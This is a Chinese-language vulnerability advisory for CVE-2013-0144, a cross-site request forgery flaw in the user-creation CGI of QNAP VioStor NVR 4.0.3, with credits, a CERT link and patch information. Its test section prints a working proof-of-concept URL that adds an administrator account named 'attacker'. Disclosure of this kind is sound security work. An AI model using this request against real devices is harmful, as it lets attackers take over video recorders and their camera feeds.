发布日期：2013-06-07
更新日期：2013-06-09

受影响系统：

QNAP VioStor NVR 4.0.3

描述：

---

CVE(CAN) ID: CVE-2013-0144

QNAP VioStor NVR是单机版网络视频摄像机。

QNAP VioStor NVR在cgi-bin/create_user.cgi的实现上存在跨站请求伪造漏洞，可使远程攻击者通过诱使管理员点击恶意链接，劫持管理员身份验证请求，从而在服务器端添加新的管理员账户。

<*来源：Tim Herres
  
  链接：http://www.kb.cert.org/vuls/id/927644
*>

测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

Tim Herres （）提供了如下测试方法：

Example: http://[server-ip]/cgi-bin/create_user.cgi?OK=&function=USER&subfun=NEW&USERNAME=&NAME=attacker&PASSWD=12345&VERIFY=12345&create_user_list=admin&PTZ1=on&Audio1=on&PTZ2=on&Audio2=on&PTZ3=on&Audio3=on&PTZ4=on&Audio4=on

建议：

---

厂商补丁：

QNAP
----
目前厂商已经发布了升级补丁以修复这个安全问题，请到厂商的主页下载：

http://www.qnapsecurity.com/AboutQNAP.asp

浏览次数：3955
严重程度：0（网友投票）